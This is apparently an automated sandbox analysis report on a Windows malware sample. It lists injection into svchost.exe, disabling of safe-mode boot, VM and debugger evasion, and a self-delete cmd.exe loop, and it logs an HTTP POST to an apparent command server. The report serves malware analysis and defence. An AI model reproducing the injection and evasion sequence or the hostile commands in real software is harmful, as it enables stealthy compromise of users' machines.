General Information

Analysis ID:28014
Start time:11:27:22
Start date:11/01/2013
Overall analysis duration:0h 3m 30s
Sample file name:1-237f8ffc0c24191c5bb7bd9099802ee4.exe
Cookbook file name:default.jbs
Analysis system description:XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
SCAE enabled:true
SCAE success:true, ratio: 100%

Classification / Threat Score

Persistence, Installation, Boot Survival:
Hiding, Stealthiness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:

Matching Signatures

Behavior Signatures
Creates temporary files
Queries a list of all running processes
Reads ini files
Spawns processes
Urls found in memory or binary data
Binary may include packed or crypted data
Creates files inside the system directory
Creates guard pages, often used to prevent reverse engineering and debugging
Downloads files from webservers via HTTP
Drops PE files
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
PE sections with suspicious entropy found
Performs DNS lookups
Posts data to webserver
AV process strings found (often used to terminate AV products)
Checks the online IP address of the machine (www.ip-address.org)
Contains capabilities to detect virtual machines
Creates an autostart registry key
Deletes itself after installation
Deletes keys which are related to windows safe boot (disables safe mode boot)
Found dropped PE file which has not been started or loaded: C:\WINDOWS\system32\1-237f8ffc0c24191c5bb7bd9099802ee4.exe
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries disk information (often used to detect virtual machines)

Code Signatures
Contains functionality to create a new security descriptor
Contains functionality to create pipes or a new desktop
Contains functionality to download additional files from the internet
Contains functionality to enum processes or threads
Contains functionality to query local / system time
Contains functionality to query windows version
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to hide windows to a different desktop

Startup

  • system is xp
  • cleanup

Created / dropped Files

File Path | MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp129C.tmp.gif | F560BF7BA58628B6B7D89CEEC97FBB2F
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp3092.tmp.gif | 6D1C9B8721FA24390A361420B868A6D5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp6F8C.tmp.jpg | AF8F571D37E66513D01510F4DBF73571
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp7239.tmp.jpg | 7FB84A91F0672B7C7F5806CC8F614DC2
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp7708.tmp.jpg | 85E7BA0D1A93F36CDB1BCB4C5CC75BE2
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp7B2C.tmp.gif | 7939A167B9497C21906431107F23CB5C
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp7DE6.tmp.jpg | 85FCF87FF2B2C025854E1AE4FCCA6862
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpA06.tmp.gif | EFEE4DA97365CC42AFC02428952171BC
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpE973.tmp.gif | E33F4B5E5E491920BD64FE0BFA46F7B5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpF20.tmp.gif | DE463C61019A555994FA530BF47028CA
C:\WINDOWS\system32\1-237f8ffc0c24191c5bb7bd9099802ee4.exe | 237F8FFC0C24191C5BB7BD9099802EE4
\ROUTER | 9EE29DE553FC6640B99B92E3E67F93CA

Contacted Domains

Name | IP | Name Server | Active | Registrar | e-Mail
www.ip-address.org | 192.162.136.86 | | true | unknown | unknown

Contacted IPs

IP | Country | Pingable | Open Ports
192.162.136.86 | unknown | true | 21 22 80 443
78.46.86.137 | GERMANY | true | 22 80
195.186.1.121 | SWITZERLAND | false |
195.186.4.121 | SWITZERLAND | false |

Static File Info

File type:PE32 executable (GUI) Intel 80386, for MS Windows
File name:1-237f8ffc0c24191c5bb7bd9099802ee4.exe
File size:127752
MD5:237f8ffc0c24191c5bb7bd9099802ee4
SHA1:0264fdbb9e05b07a689aaf0ee7b60209eca15b6b
SHA256:8c4991ddd46b7adee31bacb30d9efe572c426d79bf5f3e8edffed65e55cd0e7a
SHA512:cbec7372cfddc87ace452bdf06cf93555908c31aca768820025ab6dd561230aaa5494182cdf0665c97b20b205220e00d129329b43a22eaf174d5ca56dcfa821e

Static PE Info

General
Entrypoint:0x401840
Entrypoint Section:.text
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:0x50ED518F [Wed Jan 9 11:16:31 2013 UTC]
TLS Callbacks:
Imports
DLL | Import
KERNEL32.dll | ReadFile, ExitProcess, VirtualAllocEx, GetWindowsDirectoryA, lstrcatA, CreateFileA
USER32.dll | RegisterClassExA
GDI32.dll | GetStockObject
ADVAPI32.dll | RegOpenKeyExW
WINMM.dll | PlaySoundA
Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy
.text | 0x1000 | 0xda8 | 0xe00 | 5.29306544227
.rdata | 0x2000 | 0x1a635 | 0x1a800 | 7.94582373968
.data | 0x1d000 | 0x2b8 | 0x400 | 3.21167866906
.reloc | 0x1e000 | 0x74 | 0x200 | 1.83713353723

String Analysis

URLs
String value | Source
http://ns.adobe.com/xap/1.0/ | tmp3092.tmp.gif.dr
http://ns.adobe.com/xap/1.0/mm/ | tmp3092.tmp.gif.dr
http://ns.adobe.com/xap/1.0/stype/resourceref# | tmp3092.tmp.gif.dr
http://www.w3.org/1999/02/22-rdf-syntax-ns# | tmp3092.tmp.gif.dr
VM Artifacts
String value | Source
VMWARE | svchost.exe
AV process names
String value | Source
wireshark.exe | 1-237f8ffc0c24191c5bb7bd9099802ee4.exe

Network Behavior

TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2013 11:28:17.293838024 CET | 60401 | 53 | 192.168.0.10 | 195.186.1.121
Jan 11, 2013 11:28:18.294051886 CET | 60401 | 53 | 192.168.0.10 | 195.186.4.121
Jan 11, 2013 11:28:19.296561003 CET | 60401 | 53 | 192.168.0.10 | 195.186.1.121
Jan 11, 2013 11:28:21.293451071 CET | 60401 | 53 | 192.168.0.10 | 195.186.1.121
Jan 11, 2013 11:28:21.294487000 CET | 60401 | 53 | 192.168.0.10 | 195.186.4.121
Jan 11, 2013 11:28:25.293307066 CET | 60401 | 53 | 192.168.0.10 | 195.186.1.121
Jan 11, 2013 11:28:25.294342995 CET | 60401 | 53 | 192.168.0.10 | 195.186.4.121
Jan 11, 2013 11:28:29.502634048 CET | 53 | 60401 | 195.186.4.121 | 192.168.0.10
Jan 11, 2013 11:28:29.686904907 CET | 53 | 60401 | 195.186.1.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723196983 CET | 53 | 60401 | 195.186.4.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723232985 CET | 53 | 60401 | 195.186.1.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723267078 CET | 53 | 60401 | 195.186.1.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723294020 CET | 53 | 60401 | 195.186.4.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723347902 CET | 53 | 60401 | 195.186.1.121 | 192.168.0.10
Jan 11, 2013 11:28:29.742233992 CET | 1031 | 80 | 192.168.0.10 | 192.162.136.86
Jan 11, 2013 11:28:29.742260933 CET | 80 | 1031 | 192.162.136.86 | 192.168.0.10
Jan 11, 2013 11:28:29.742600918 CET | 1031 | 80 | 192.168.0.10 | 192.162.136.86
Jan 11, 2013 11:28:29.746618986 CET | 1031 | 80 | 192.168.0.10 | 192.162.136.86
Jan 11, 2013 11:28:29.746632099 CET | 80 | 1031 | 192.162.136.86 | 192.168.0.10
Jan 11, 2013 11:28:52.918301105 CET | 80 | 1031 | 192.162.136.86 | 192.168.0.10
Jan 11, 2013 11:28:52.954636097 CET | 80 | 1031 | 192.162.136.86 | 192.168.0.10
Jan 11, 2013 11:28:52.955142975 CET | 1031 | 80 | 192.168.0.10 | 192.162.136.86
Jan 11, 2013 11:28:52.956044912 CET | 1031 | 80 | 192.168.0.10 | 192.162.136.86
Jan 11, 2013 11:28:52.956058979 CET | 80 | 1031 | 192.162.136.86 | 192.168.0.10
Jan 11, 2013 11:28:54.032778978 CET | 1032 | 80 | 192.168.0.10 | 78.46.86.137
Jan 11, 2013 11:28:54.032807112 CET | 80 | 1032 | 78.46.86.137 | 192.168.0.10
Jan 11, 2013 11:28:54.032972097 CET | 1032 | 80 | 192.168.0.10 | 78.46.86.137
Jan 11, 2013 11:28:54.033302069 CET | 1032 | 80 | 192.168.0.10 | 78.46.86.137
Jan 11, 2013 11:28:54.033313036 CET | 80 | 1032 | 78.46.86.137 | 192.168.0.10
Jan 11, 2013 11:28:55.857000113 CET | 80 | 1032 | 78.46.86.137 | 192.168.0.10
Jan 11, 2013 11:28:55.994759083 CET | 80 | 1032 | 78.46.86.137 | 192.168.0.10
Jan 11, 2013 11:28:55.995234013 CET | 1032 | 80 | 192.168.0.10 | 78.46.86.137
Jan 11, 2013 11:28:55.996102095 CET | 1032 | 80 | 192.168.0.10 | 78.46.86.137
Jan 11, 2013 11:28:55.996117115 CET | 80 | 1032 | 78.46.86.137 | 192.168.0.10
UDP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2013 11:28:17.293838024 CET | 60401 | 53 | 192.168.0.10 | 195.186.1.121
Jan 11, 2013 11:28:18.294051886 CET | 60401 | 53 | 192.168.0.10 | 195.186.4.121
Jan 11, 2013 11:28:19.296561003 CET | 60401 | 53 | 192.168.0.10 | 195.186.1.121
Jan 11, 2013 11:28:21.293451071 CET | 60401 | 53 | 192.168.0.10 | 195.186.1.121
Jan 11, 2013 11:28:21.294487000 CET | 60401 | 53 | 192.168.0.10 | 195.186.4.121
Jan 11, 2013 11:28:25.293307066 CET | 60401 | 53 | 192.168.0.10 | 195.186.1.121
Jan 11, 2013 11:28:25.294342995 CET | 60401 | 53 | 192.168.0.10 | 195.186.4.121
Jan 11, 2013 11:28:29.502634048 CET | 53 | 60401 | 195.186.4.121 | 192.168.0.10
Jan 11, 2013 11:28:29.686904907 CET | 53 | 60401 | 195.186.1.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723196983 CET | 53 | 60401 | 195.186.4.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723232985 CET | 53 | 60401 | 195.186.1.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723267078 CET | 53 | 60401 | 195.186.1.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723294020 CET | 53 | 60401 | 195.186.4.121 | 192.168.0.10
Jan 11, 2013 11:28:29.723347902 CET | 53 | 60401 | 195.186.1.121 | 192.168.0.10
ICMP Packets
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 11, 2013 11:28:29.687268972 CET | 192.168.0.10 | 195.186.1.121 | 8330 | (Port unreachable) | Destination Unreachable
Jan 11, 2013 11:28:29.723541975 CET | 192.168.0.10 | 195.186.4.121 | 8630 | (Port unreachable) | Destination Unreachable
Jan 11, 2013 11:28:29.723622084 CET | 192.168.0.10 | 195.186.1.121 | 8330 | (Port unreachable) | Destination Unreachable
Jan 11, 2013 11:28:29.723700047 CET | 192.168.0.10 | 195.186.1.121 | 8330 | (Port unreachable) | Destination Unreachable
Jan 11, 2013 11:28:29.723776102 CET | 192.168.0.10 | 195.186.4.121 | 8630 | (Port unreachable) | Destination Unreachable
Jan 11, 2013 11:28:29.723985910 CET | 192.168.0.10 | 195.186.1.121 | 8330 | (Port unreachable) | Destination Unreachable
DNS Queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 11, 2013 11:28:17.293838024 CET | 192.168.0.10 | 195.186.1.121 | 0x3ce8 | Standard query (0) | www.ip-address.org | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:18.294051886 CET | 192.168.0.10 | 195.186.4.121 | 0x3ce8 | Standard query (0) | www.ip-address.org | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:19.296561003 CET | 192.168.0.10 | 195.186.1.121 | 0x3ce8 | Standard query (0) | www.ip-address.org | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:21.293451071 CET | 192.168.0.10 | 195.186.1.121 | 0x3ce8 | Standard query (0) | www.ip-address.org | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:21.294487000 CET | 192.168.0.10 | 195.186.4.121 | 0x3ce8 | Standard query (0) | www.ip-address.org | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:25.293307066 CET | 192.168.0.10 | 195.186.1.121 | 0x3ce8 | Standard query (0) | www.ip-address.org | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:25.294342995 CET | 192.168.0.10 | 195.186.4.121 | 0x3ce8 | Standard query (0) | www.ip-address.org | A (IP address) | IN (0x0001)
DNS Answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 11, 2013 11:28:29.502634048 CET | 195.186.4.121 | 192.168.0.10 | 0x3ce8 | No error (0) | www.ip-address.org | | 192.162.136.86 | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:29.686904907 CET | 195.186.1.121 | 192.168.0.10 | 0x3ce8 | No error (0) | www.ip-address.org | | 192.162.136.86 | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:29.723196983 CET | 195.186.4.121 | 192.168.0.10 | 0x3ce8 | No error (0) | www.ip-address.org | | 192.162.136.86 | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:29.723232985 CET | 195.186.1.121 | 192.168.0.10 | 0x3ce8 | No error (0) | www.ip-address.org | | 192.162.136.86 | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:29.723267078 CET | 195.186.1.121 | 192.168.0.10 | 0x3ce8 | No error (0) | www.ip-address.org | | 192.162.136.86 | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:29.723294020 CET | 195.186.4.121 | 192.168.0.10 | 0x3ce8 | No error (0) | www.ip-address.org | | 192.162.136.86 | A (IP address) | IN (0x0001)
Jan 11, 2013 11:28:29.723347902 CET | 195.186.1.121 | 192.168.0.10 | 0x3ce8 | No error (0) | www.ip-address.org | | 192.162.136.86 | A (IP address) | IN (0x0001)
HTTP Request Dependency Graph
  • www.ip-address.org
  • 78.46.86.137
HTTP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Total Bytes Transferred (KB)
(the HTTP header of each packet is listed, indented, below its row)
Jan 11, 2013 11:28:29.746618986 CET | 1031 | 80 | 192.168.0.10 | 192.162.136.86 | 2
    GET /ip-checker.php HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
    Host: www.ip-address.org
Jan 11, 2013 11:28:52.918301105 CET | 80 | 1031 | 192.162.136.86 | 192.168.0.10 | 2
    HTTP/1.1 200 OK
    Date: Fri, 11 Jan 2013 10:28:51 GMT
    Server: LiteSpeed
    Connection: close
    X-Powered-By: PHP/5.2.17
    Content-Type: text/html
    Content-Length: 735
    Vary: User-Agent
Jan 11, 2013 11:28:54.033302069 CET | 1032 | 80 | 192.168.0.10 | 78.46.86.137 | 4
    POST /index.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=213218
    Host: 78.46.86.137
    Connection: close
    Cache-Control: no-cache
    Content-Length: 354
Jan 11, 2013 11:28:55.857000113 CET | 80 | 1032 | 78.46.86.137 | 192.168.0.10 | 4
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 11 Jan 2013 10:28:54 GMT
    Content-Type: text/html
    Connection: close
    X-Powered-By: PHP/5.3.3-7+squeeze14
    Vary: Accept-Encoding
    Content-Length: 60

Code Manipulation Behavior

System Behavior

General
Start time:09:49:56
Start date:24/01/2012
Path:C:\1-237f8ffc0c24191c5bb7bd9099802ee4.exe
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0x400000
File size:127752 bytes
MD5 hash:237F8FFC0C24191C5BB7BD9099802EE4
General
Start time:09:49:57
Start date:24/01/2012
Path:C:\WINDOWS\system32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\svchost.exe
Imagebase:0x77f60000
File size:14336 bytes
MD5 hash:27C6D03BCDB8CFEB96B716F3D8BE3E18
General
Start time:09:50:34
Start date:24/01/2012
Path:C:\WINDOWS\system32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\cmd.exe /q /c for /l %i in (1 1 4000000000) do if not exist C:\1-237f8ffc0c24191c5bb7bd9099802ee4.exe (exit) else (del /f C:\1-237f8ffc0c24191c5bb7bd9099802ee4.exe )
Imagebase:0x4ad00000
File size:389120 bytes
MD5 hash:6D778E0F95447E6546553EEEA709D03C

Disassembly

Code Analysis

    Executed Functions
    APIs
    • memset.NTDLL(?,00000000), ref: 004015A7
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004015D3
    • lstrcpy.KERNEL32(?,svchost.exe), ref: 004015F9
    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00401619
    • RtlGetLastWin32Error.NTDLL ref: 00401623
    • memset.NTDLL(?,00000000), ref: 0040164C
    • GetThreadContext.KERNEL32(?,?), ref: 00401669
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000), ref: 0040168C
    • CreateFileMappingA.KERNEL32(000000FF), ref: 0040169F
    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000), ref: 004016B7
    • RtlGetLastWin32Error.NTDLL ref: 004016C4
    • NtMapViewOfSection.NTDLL(?,?,?,00000000), ref: 004016F7
    • NtMapViewOfSection.NTDLL(?,?,?,00000000), ref: 00401721
    • WriteProcessMemory.KERNEL32(?,00402288,?,?,00000000), ref: 00401745
    • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,00000001,00000000,00000040,?,000F001F,00000000,00000000), ref: 00401793
    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00401808
    • SetThreadContext.KERNEL32(?,?), ref: 00401829
    • ResumeThread.KERNEL32(?), ref: 00401837
    • RtlGetLastWin32Error.NTDLL ref: 00401842
    • UnmapViewOfFile.KERNEL32(00000000), ref: 00401852
    • CloseHandle.KERNEL32(?), ref: 00401862
    • TerminateProcess.KERNEL32(?,00000000), ref: 00401878
    • CloseHandle.KERNEL32(?), ref: 00401882
    • CloseHandle.KERNEL32(?), ref: 00401888
    Strings
    APIs
    • _alloca_probe.NTDLL ref: 004013C5
    • _snprintf.NTDLL ref: 004013EC
    • RtlGetLastWin32Error.NTDLL ref: 004013F8
    • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00401419
    • RtlGetLastWin32Error.NTDLL ref: 00401426
    • memset.NTDLL(?,00000000), ref: 00401462
    • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0040148B
    • RtlGetLastWin32Error.NTDLL ref: 00401495
    • CloseHandle.KERNEL32 ref: 0040149E
      • Part of subcall function 00401270: tolower.NTDLL ref: 004012A2
      • Part of subcall function 00401270: isspace.NTDLL ref: 004012AD
      • Part of subcall function 00401270: isprint.NTDLL ref: 004012F9
      • Part of subcall function 00401270: isprint.NTDLL ref: 00401323
      • Part of subcall function 00401270: isspace.NTDLL ref: 00401375
    • CloseHandle.KERNEL32 ref: 004014E1
    • CloseHandle.KERNEL32 ref: 00401507
    Strings
    APIs
    • GetProcessHeap.KERNEL32 ref: 00401139
    • RtlAllocateHeap.NTDLL(?,?,RtlGetCompressionWorkSpaceSize), ref: 00401140
      • Part of subcall function 00401E30: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401E5D
      • Part of subcall function 00401E30: VirtualAlloc.KERNEL32(00000000,0002CE82,00001000,00000004), ref: 00401E6D
      • Part of subcall function 00401E30: memset.NTDLL(?,00000000), ref: 00401E75
      • Part of subcall function 00401E30: RtlDecompressBuffer.NTDLL(00000102,?,0002CE82,?,00016741,?), ref: 00401E9F
      • Part of subcall function 00401E30: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401EE4
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004011B5
      • Part of subcall function 00401530: memset.NTDLL(?,00000000), ref: 004015A7
      • Part of subcall function 00401530: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004015D3
      • Part of subcall function 00401530: lstrcpy.KERNEL32(?,svchost.exe), ref: 004015F9
      • Part of subcall function 00401530: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00401619
      • Part of subcall function 00401530: RtlGetLastWin32Error.NTDLL ref: 00401623
      • Part of subcall function 00401530: memset.NTDLL(?,00000000), ref: 0040164C
      • Part of subcall function 00401530: GetThreadContext.KERNEL32(?,?), ref: 00401669
      • Part of subcall function 00401530: CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000), ref: 0040168C
      • Part of subcall function 00401530: CreateFileMappingA.KERNEL32(000000FF), ref: 0040169F
      • Part of subcall function 00401530: MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000), ref: 004016B7
      • Part of subcall function 00401530: RtlGetLastWin32Error.NTDLL ref: 004016C4
      • Part of subcall function 00401530: NtMapViewOfSection.NTDLL(?,?,?,00000000), ref: 004016F7
      • Part of subcall function 00401530: NtMapViewOfSection.NTDLL(?,?,?,00000000), ref: 00401721
      • Part of subcall function 00401530: WriteProcessMemory.KERNEL32(?,00402288,?,?,00000000), ref: 00401745
      • Part of subcall function 00401530: memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,00000001,00000000,00000040,?,000F001F,00000000,00000000), ref: 00401793
      • Part of subcall function 00401530: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00401808
      • Part of subcall function 00401530: SetThreadContext.KERNEL32(?,?), ref: 00401829
      • Part of subcall function 00401530: ResumeThread.KERNEL32(?), ref: 00401837
      • Part of subcall function 00401530: RtlGetLastWin32Error.NTDLL ref: 00401842
      • Part of subcall function 00401530: UnmapViewOfFile.KERNEL32(00000000), ref: 00401852
      • Part of subcall function 00401530: CloseHandle.KERNEL32(?), ref: 00401862
      • Part of subcall function 00401530: TerminateProcess.KERNEL32(?,00000000), ref: 00401878
      • Part of subcall function 00401530: CloseHandle.KERNEL32(?), ref: 00401882
      • Part of subcall function 00401530: CloseHandle.KERNEL32(?), ref: 00401888
    • GetProcessHeap.KERNEL32 ref: 004011D5
    • RtlFreeHeap.NTDLL(?,?,RtlGetCompressionWorkSpaceSize), ref: 004011DC
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004011EE
    Strings
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401D5B
    • memset.NTDLL(?,00000000), ref: 00401D7E
    • Process32FirstW.KERNEL32(?,?), ref: 00401D96
    • lstrcmpiW.KERNEL32(?,00404000), ref: 00401DBC
    • Process32NextW.KERNEL32(?,?), ref: 00401DD4
    • CloseHandle.KERNEL32 ref: 00401DE0
    Strings
    • RtlGetCompressionWorkSpaceSize, xrefs: 00401D9F
    APIs
    • CreateFileA.KERNEL32(?,00000001,00000003,00000000,00000003,00000080,00000000), ref: 00401C92
    Strings
    APIs
    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0040100C
    • GetProcAddress.KERNEL32(?,RtlCompressBuffer), ref: 00401020
    • GetProcAddress.KERNEL32(?,RtlDecompressBuffer), ref: 0040102D
    • GetProcAddress.KERNEL32(?,RtlGetCompressionWorkSpaceSize), ref: 0040103A
      • Part of subcall function 00401B40: lstrlen.KERNEL32(?), ref: 00401B9D
      • Part of subcall function 00401B40: CharUpperBuffA.USER32(?), ref: 00401BA5
      • Part of subcall function 00401B40: lstrlen.KERNEL32(?), ref: 00401BAF
      • Part of subcall function 00401B40: CharUpperBuffA.USER32(?), ref: 00401BBA
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401BC6
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401BE0
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401BFA
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C14
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C2E
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C48
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C65
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401C82
      • Part of subcall function 00401B40: GetModuleHandleA.KERNEL32(00000000), ref: 00401CBF
      • Part of subcall function 00401B40: GetModuleFileNameA.KERNEL32 ref: 00401CC6
      • Part of subcall function 00401B40: lstrlen.KERNEL32(?), ref: 00401CD8
      • Part of subcall function 00401B40: CharUpperBuffA.USER32(?), ref: 00401CE3
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401CF2
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401D0B
      • Part of subcall function 00401B40: strstr.NTDLL(?), ref: 00401D24
      • Part of subcall function 00401080: GetModuleHandleA.KERNEL32(00000000), ref: 00401092
      • Part of subcall function 00401080: GetModuleFileNameA.KERNEL32 ref: 00401099
      • Part of subcall function 00401080: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004010A8
      • Part of subcall function 00401080: _snprintf.NTDLL ref: 004010C7
      • Part of subcall function 00401080: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 004010DE
      • Part of subcall function 00401080: ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 004010F9
    • ExitProcess.KERNEL32(00000661,?,RtlDecompressBuffer,?,RtlCompressBuffer), ref: 00401068
      • Part of subcall function 00401110: GetProcessHeap.KERNEL32 ref: 00401139
      • Part of subcall function 00401110: RtlAllocateHeap.NTDLL(?,?,RtlGetCompressionWorkSpaceSize), ref: 00401140
      • Part of subcall function 00401110: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004011B5
      • Part of subcall function 00401110: GetProcessHeap.KERNEL32 ref: 004011D5
      • Part of subcall function 00401110: RtlFreeHeap.NTDLL(?,?,RtlGetCompressionWorkSpaceSize), ref: 004011DC
      • Part of subcall function 00401110: VirtualFree.KERNEL32(?,00000000,00008000), ref: 004011EE
    • ExitProcess.KERNEL32(?,?,RtlDecompressBuffer,?,RtlCompressBuffer), ref: 00401074
      • Part of subcall function 00401D50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401D5B
      • Part of subcall function 00401D50: memset.NTDLL(?,00000000), ref: 00401D7E
      • Part of subcall function 00401D50: Process32FirstW.KERNEL32(?,?), ref: 00401D96
      • Part of subcall function 00401D50: lstrcmpiW.KERNEL32(?,00404000), ref: 00401DBC
      • Part of subcall function 00401D50: Process32NextW.KERNEL32(?,?), ref: 00401DD4
      • Part of subcall function 00401D50: CloseHandle.KERNEL32 ref: 00401DE0
      • Part of subcall function 00401E00: GetModuleHandleA.KERNEL32(00404004), ref: 00401E17
    Strings
    • ntdll.dll, xrefs: 00401007
    • RtlCompressBuffer, xrefs: 0040101A
    • RtlDecompressBuffer, xrefs: 00401022
    • RtlGetCompressionWorkSpaceSize, xrefs: 0040102F
    • /q /c for /l %%i in (1, 1, 4000000000) do if not exist "%s" (exit) else (del /f "%s"), xrefs:
    • ComSpec, xrefs:
    APIs
    • RegCreateKeyExA.ADVAPI32 ref: 00401AC4
    • RegQueryValueExA.ADVAPI32(?,VideoBiosVersion,00000000,?,?,?), ref: 00401B02
    • RegCloseKey.ADVAPI32 ref: 00401B0C
    • CharUpperBuffA.USER32(?,?), ref: 00401B1C
    • strstr.NTDLL(?), ref: 00401B2C
    Strings
    APIs
    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401E5D
    • VirtualAlloc.KERNEL32(00000000,0002CE82,00001000,00000004), ref: 00401E6D
    • memset.NTDLL(?,00000000), ref: 00401E75
    • RtlDecompressBuffer.NTDLL(00000102,?,0002CE82,?,00016741,?), ref: 00401E9F
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401EE4
    Strings
    • RtlGetCompressionWorkSpaceSize, xrefs: 00401E40
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919B5F
      • Part of subcall function 00919810: LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 00919862
      • Part of subcall function 00919810: GetProcAddress.KERNEL32(?), ref: 009198E6
      • Part of subcall function 00919810: GetProcAddress.KERNEL32(?), ref: 00919902
    • UnmapViewOfFile.KERNEL32(00400000), ref: 00919C11
    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00919C32
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919C4C
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919C6D
    • VirtualProtect.KERNEL32(00000000,00000006,00000040,?), ref: 00919D89
    APIs
    • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 00919862
    • GetProcAddress.KERNEL32(?), ref: 009198E6
    • GetProcAddress.KERNEL32(?), ref: 00919902
    APIs
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919DC0
    Non-executed Functions
    Strings
    APIs
      • Part of subcall function 00401A90: RegCreateKeyExA.ADVAPI32 ref: 00401AC4
